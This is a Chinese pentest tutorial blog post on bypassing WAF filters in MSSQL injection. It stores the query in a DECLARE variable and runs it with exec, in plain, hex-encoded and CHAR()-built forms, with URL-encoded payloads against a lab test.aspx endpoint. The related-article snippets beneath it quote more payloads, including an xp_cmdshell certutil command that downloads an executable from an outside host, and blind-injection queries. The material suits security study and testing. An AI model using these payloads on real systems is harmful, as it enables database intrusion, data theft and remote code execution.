渗透测试之MSSQL简单绕过注入(declare函数)

最新推荐文章于 2023-12-16 15:51:11 发布
最新推荐文章于 2023-12-16 15:51:11 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: 渗透测试基础
原文链接:https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/1.5.MSSQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5.md
版权

  引进一个declare 函数,他是mssql声明局部变量的函数,我们经常用它来绕过waf对一些关键词的拦截

select * from admin where id =1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) --
http://192.168.20.155/test.aspx?id=1;select%20*%20from%20admin%20where%20id%20=1;declare%20@a%20nvarchar(2000)%20set%20@a='select%20convert(int,@@version)'%20exec(@a)%20--+

 

  declare定义变量 set设置变量值 exec执行变量

  变量的值是支持hex和ascii码的,当过滤引号我们就可以这么用 把我们的语句编码一下

select * from admin where id =1;declare @s varchar(2000) set @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec(@s)--
http://192.168.20.155/test.aspx?id=1;select%20*%20from%20admin%20where%20id%20=1;declare%20@s%20varchar(2000)%20set%20@s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29%20exec(@s)--+

  

select * from admin where id =1;declare @s varchar(2000) set @s= CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@s)--
http://192.168.20.155/test.aspx?id=1;select * from admin where id =1;declare @s varchar(2000) set @s= CHAR(115) %2b CHAR(101) %2b CHAR(108) %2b CHAR(101) %2b CHAR(99) %2b CHAR(116) %2b CHAR(32) %2b CHAR(99) %2b CHAR(111) %2b CHAR(110) %2b CHAR(118) %2b CHAR(101) %2b CHAR(114) %2b CHAR(116) %2b CHAR(40) %2b CHAR(105) %2b CHAR(110) %2b CHAR(116) %2b CHAR(44) %2b CHAR(64) %2b CHAR(64) %2b CHAR(118) %2b CHAR(101) %2b CHAR(114) %2b CHAR(115) %2b CHAR(105) %2b CHAR(111) %2b CHAR(110) %2b CHAR(41) exec(@s)--+

 

  ‘+’号最好用url编码一下改成%2b

LKmnbZ
关注
专栏目录
SQL注入绕过 单引号 限制继续注入
10-29
然而,简单地过滤掉单引号并不能完全防止SQL注入攻击,因为攻击者可以使用其他技巧来绕过这种限制。 文章中首先给出的是一个典型的SQL注入攻击示例: ``` //***/show.asp?id=1;exec master.dbo.xp_cmdshell '...
MSSQL常用查询写法2
yuanxi21的博客
03-02 205
MSSQL常用查询写法
MSSQL 存储过程:功能和用法详解
最新发布
naer_chongya的博客
12-16 1226
MSSQL 存储过程是一种在 Microsoft SQL Server 数据库中存储和执行代码的强大工具。本文将详细介绍 MSSQL 存储过程的功能和用法,包括定义和创建存储过程、参数的使用、事务控制、错误处理以及优点和示例等方面,帮助读者更好地了解和运用 MSSQL 存储过程。
SQL server数据库declare和set、用法技巧
dihuoliubing的博客
10-31 1万+
直接赋值时set与select并无区别,只有所赋的值是一个查询结果时二者才有不同,当查询结果唯一时(如最大最小值),set和select都可以完成赋值,但是查询结果不止一个时使用set会提示错误。
mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
7Riven's blog
11-07 3371
1.注入类型 布尔盲注:http://192.168.232.174/Test.aspx?id=1and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100 验证如下: 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substr...
如何理解SQL sever数据库中的declare
McNeeley的博客
04-14 1001
在这里可能有一些误解,有人认为@count是变量名,也有人认为count是变量名,而@只是一个符号,其实不管那一种理解对于声明变量上来说是不影响的,事实上应该来说@count被称为变量名较为合适些。,只要表存在,那么表名一定会存在于master数据库中的一个表中,列名也是一样,这一类的变量有一个特殊,都是。所以一般情况下,我们只称@前置的为变量,没有前置的为数据库相关变量,而@@是系统变量不须声明。,然后就可以了使用了,这种情况下的变量前边是没有@符号提示的。本文原创作者 博客园寂子。
MSsqlL注入取得网站路径最好的方法.txt
07-18
在MSsqlL注入中,获取网站路径通常是攻击者感兴趣的目标之一。通过这些路径信息,攻击者可能进一步定位到敏感文件的位置,甚至实现对整个系统的控制。下面介绍一种有效的方法来获取网站路径: ### 方法步骤详解 ##...
mssql高手注入.txt
07-18
这种方式可以绕过简单的验证逻辑,使攻击者能够执行任意查询。 #### 2. 使用`xp_cmdshell`扩展存储过程 `xp_cmdshell`是MSSQL中的一个强大的扩展存储过程,它允许执行操作系统命令。例如,攻击者可以通过以下方式...
declare:明确声明Javascript函数中的参数类型
05-21
Declare.js 在Javascript中,声明函数时,不能对其参数类型进行任何限制。 在执行过程中,您始终必须手动检查参数的类型。 这意味着您可以使用任何类型的参数调用相同的函数。 这可能会导致无法预料的行为。 例如...
一篇文章由浅入深了解MSSQL注入
bylfsj的博客
10-12 469
MSSQL提权与站库分离 0x00 xp_cmdshell exec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe'; exec master.dbo.xp_cmdshell 'cd c:www & fil...
MSSQL存储过程详解
热门推荐
nutian的专栏
10-30 2万+
SQL Server 存储过程详解存储过程的优缺点  ◆优点:  执行速度更快。存储过程只在创造时进行编译,而一般SQL语句每执行一次就编译一次,所以使用存储过程执行速度更快。  存储过程用于处理复杂的操作时,程序的可读性更强、网络的负担更小。  使用存储过程封装事务性能更佳。  能有效的放注入,安全性更好。  可维护性高,在一些业务规则发生变化时,有时只需调整存储过程即可,而不用
MySQL 复习笔记
weixin_33672400的博客
10-06 353
本文内容 SQL 语句 创建数据库 创建数据表 数据完整性约束 四种基本字符类型说明 SQL 基本语句 类型转换函数 日期函数 数学函数 字符串函数 合并结果集 union CASE 函数用法 IF ELSE 语法 WHILE 循环语法 子查询 表连接 join 事务 视图 触发器 ...
msql 存储过程 变量 (二)
jin521436的专栏
09-03 799
1.变量定义,变量通过declare定义 DECLARE语句被用来把不同项目局域到一个子程序:局部变量 DECLARE仅被用在BEGIN ... END复合语句里,并且必须在复合语句的开头,在任何其它 DECLARE var_name[,...] type [DEFAULT value] 这个语句被用来声明局部变量。 要给变量提供一个默认值,请包含一个DEFAULT子句。 值可
Sql server注入分类之语句总结
qq_42990434的博客
12-16 3427
关于mssql注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据 基础语句 select ***://查询指令 @@version // 数据库版本 system_user //系统用户 suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作 user //获取当前数据库用户名 db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库
MSSQL简单的时间处理(转)
Lucker's PowerSpace
12-12 731
--时间的处理 --(1)短时间的处理 declare @S datetime set @S=getdate() select (convert(varchar(10),@S,120)) select datediff(m,@S,3) select replace(convert(varchar(10),@S,120),-0,-) --
MSSQL变量与赋值
祥亨的博客
02-13 1088
----定义一个变量 @stuNumber,用来存储学生的数量 --方法01 :使用 SetDeclare @stuNumber intSet @stuNumber=(Select Count(*) from LibraryDB.dbo.student)Select @stuNumber As '学生数量' go ---一个批处理的结束和另一个批处理的开始, 在批处理中变量名称不能重复 -...
MSSQL扫盲系列(1)-CREATE,ALTER,DROP
weixin_34100227的博客
03-10 122
简单的数据定义(CREATE,ALTER,DROP,DECLARE) 表,列,视图,索引,触发器 创建表,并附带各种约束,默认值 View Code CREATE TABLE USERS ( ID INT IDENTITY(1,1) PRIMARY KEY,--自增主键 -- ID CHAR(32)...
Sql学习第三天——SQL 关于使用CTE(公用表表达式)的递归查询
weixin_30568591的博客
03-22 170
关于使用CTE(公用表表达式)的递归查询----SQL Server 2005及以上版本   公用表表达式 (CTE) 具有一个重要的优点,那就是能够引用其自身,从而创建递归 CTE。递归 CTE 是一个重复执行初始 CTE 以返回数据子集直到获取完整结果集的公用表表达式。   当某个查询引用递归 CTE 时,它即被称为递归查询。递归查询通常用于返回分层数据,例如:显示某个组织图中的雇员或物料...
mysqldeclare会报错_mysql导入存储过程时declare报错的问题解决
weixin_42512494的博客
02-02 6892
在导入存储过程时经常遇见下列DECLARE报错的问题:Error Code : 1064You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3(0 ms take...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值